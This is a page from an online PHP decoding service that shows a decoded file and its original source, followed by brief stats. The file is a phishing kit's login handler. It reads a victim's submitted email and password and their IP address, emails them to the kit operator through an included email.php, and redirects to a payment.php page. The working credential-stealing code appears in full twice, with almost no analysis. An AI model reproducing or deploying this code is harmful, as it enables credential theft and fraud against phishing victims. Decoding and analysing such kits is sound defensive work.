Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ###################################################################################..

Decoded Output download

<?php 
###################################################################################################### 
###################################################################################################### 
###################################################################################################### 
###################################################################################################### 
#                                                                                                    # 
#   ########  ##    ##  ########  ##        ########  ########  ########   ###       ###      ####   # 
#   ##        ##    ##  ##        ##        #     ##  ##    ##  ##    ##     ###   ###       ## ##   # 
#   ##        ##    ##  ##        ##        #     ##  ##    ##  ##    ##      ##   ##       ##  ##   # 
#   ##        ########  ########  ##        ########  ##    ##  ########       ## ##            ##   # 
#   ##        ##    ##  ##        ##        #     ##  ##    ##        ##        ###             ##   # 
#   ##        ##    ##  ##        ##        #     ##  ##    ##        ##         #              ##   # 
#   ########  ##    ##  ########  ########  ########  ########        ##         #            ###### # 
#                              \ FB:https://www.facebook.com/chlboo9 //                             # 
###################################################################################################### 
###################################################################################################### 
###################################################################################################### 
###################################################################################################### 
//////// 
 
session_start(); 
$ip = getenv("REMOTE_ADDR"); 
 
$_SESSION['email'] = $_POST['email']; 
$_SESSION['password'] = $_POST['password']; 
 
$headers = "From: XVerginia <[email protected]>
" ; 
$msg = 
"------------NEW LOGIN---------------------> 
Email Address : ".$_SESSION['email']." 
Password : ".$_SESSION['password']." 
IP : $ip 
+=+=+=+=+=+=+=+=+=## XVerginia ##+=+=+=+=+=+=+=+=+=+=+=+="; 
 
include 'email.php'; 
$subj = " Login Info  - $ip"; 
$headers .= "Content-Type: text/plain; charset=UTF-8
"; 
$headers .= "Content-Transfer-Encoding: 8bit
"; 
mail("$to", $subj, $msg,"$headers"); 
header("Location: payment.php?ip=$ip"); 
?>

Did this file decode correctly?

Original Code

<?php
######################################################################################################
######################################################################################################
######################################################################################################
######################################################################################################
#                                                                                                    #
#   ########  ##    ##  ########  ##        ########  ########  ########   ###       ###      ####   #
#   ##        ##    ##  ##        ##        #     ##  ##    ##  ##    ##     ###   ###       ## ##   #
#   ##        ##    ##  ##        ##        #     ##  ##    ##  ##    ##      ##   ##       ##  ##   #
#   ##        ########  ########  ##        ########  ##    ##  ########       ## ##            ##   #
#   ##        ##    ##  ##        ##        #     ##  ##    ##        ##        ###             ##   #
#   ##        ##    ##  ##        ##        #     ##  ##    ##        ##         #              ##   #
#   ########  ##    ##  ########  ########  ########  ########        ##         #            ###### #
#                              \\ FB:https://www.facebook.com/chlboo9 //                             #
######################################################################################################
######################################################################################################
######################################################################################################
######################################################################################################
////////

session_start();
$ip = getenv("REMOTE_ADDR");

$_SESSION['email'] = $_POST['email'];
$_SESSION['password'] = $_POST['password'];

$headers = "From: XVerginia <[email protected]>\r\n" ;
$msg =
"------------NEW LOGIN--------------------->
Email Address : ".$_SESSION['email']."
Password : ".$_SESSION['password']."
IP : $ip
+=+=+=+=+=+=+=+=+=## XVerginia ##+=+=+=+=+=+=+=+=+=+=+=+=";

include 'email.php';
$subj = " Login Info  - $ip";
$headers .= "Content-Type: text/plain; charset=UTF-8\n";
$headers .= "Content-Transfer-Encoding: 8bit\n";
mail("$to", $subj, $msg,"$headers");
header("Location: payment.php?ip=$ip");
?>

Function Calls

getenv 1
session_start 1

Variables

None

Stats

MD5 4af614bfdc1150b1e17ae2b0a38a84d0
Eval Count 0
Decode Time 93 ms